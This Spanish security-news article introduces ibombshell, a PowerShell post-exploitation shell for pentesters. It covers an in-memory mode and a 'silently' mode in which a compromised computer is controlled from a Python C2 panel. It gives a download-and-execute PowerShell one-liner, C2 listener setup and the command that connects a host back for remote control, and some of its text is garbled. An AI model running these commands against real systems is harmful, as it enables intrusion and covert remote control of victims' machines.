ibombshell es una herramienta escrita en Powershell que permite alertas rápidas son funcionalidades post-exploit (y en algunos casos, durante el exploit). Como reseñan especialistas en borrado seguro de datos, ibombshell es un shell que se descarga directamente a la memoria y proporciona acceso a una gran cantidad de características de pentesting. Estas funcionalidades se pueden descargar directamente a la memoria, en forma de una función Powershell. Esta función se conoce como everywhere.
Además, ibombshell proporciona un segundo modo de ejecución llamado silently, con lo que el pentester puede ejecutar una instancia de ibombshell (llamada warrior). La computadora comprometida se conectará a un panel C2 a través de HTTP. Por lo tanto, será posible controlar warrior y ser capaz de cargar funciones en la memoria que ayudan al pentester. Esto sucede en la fase post-exploit.
Requerimientos
Para ejecutar la funcionalidad de ibombshell everywhere es obligatorio tener PowerShell 3.0 o superior. Para sistemas operativos que no sean Windows, puede leer más sobre esto en PowerShell GitHub.
Para ejecutar el modo silently de ibombshell necesita Python 3.6 y algunas bibliotecas de Python. Puedes instalar esto con:
cd ibombshell\ c2/ pip install -r requirements.txt
Uso
ibombshell tiene dos modos de ejecución:
ibombshell everywhere
Para cargar ibombshell simplemente ejecute en Powershell:
iex(newobjectnet.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)
Ahora puede ejecutar la consola descargada de ibombshell en ejecución:
console
ibombshell silently
Esta versión le permite ejecutar la consola ibombshell y controlarla de forma remota desde el panel C2 creado en python. Para ejecutar esta versión, primero debe iniciar el proceso de la consola en PowerShell:
iex(newobjectnet.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)
En la ruta de ibombshell C2, prepare el C2:
python3 ibombshell.py
Cree el listener:
iBombShell> load modules/listener.py [+] Loading module… [+] Module loaded! iBombShell[modules/listener.py]> run
El puerto listener predeterminado es 8080. Finalmente, puede iniciar la consola en modo silently en el host para obtener el control remoto:
console -Silently -uriConsole https://[ip or domain]:[port]
Docker
Hemos creado un docker acoplable con todo lo que necesita para que funcione. Ejecute este comando desde la ubicación de Dockerfile.
sudo docker build -t “ibombshell” . sudo docker run -it ibombshell
VÍDEOS
Entusiasta de la seguridad cibernética. Especialista en seguridad de la información, actualmente trabajando como especialista en infraestructura de riesgos e investigador.
Experiencia en procesos de riesgo y control, soporte de auditoría de seguridad, diseño y soporte de COB (continuidad del negocio), gestión de grupos de trabajo y estándares de seguridad de la información.
Envía tips de noticias a info@noticiasseguridad.com o www.instagram.com/iicsorg/.
También puedes encontrarnos en Telegram www.t.me/noticiasciberseguridad
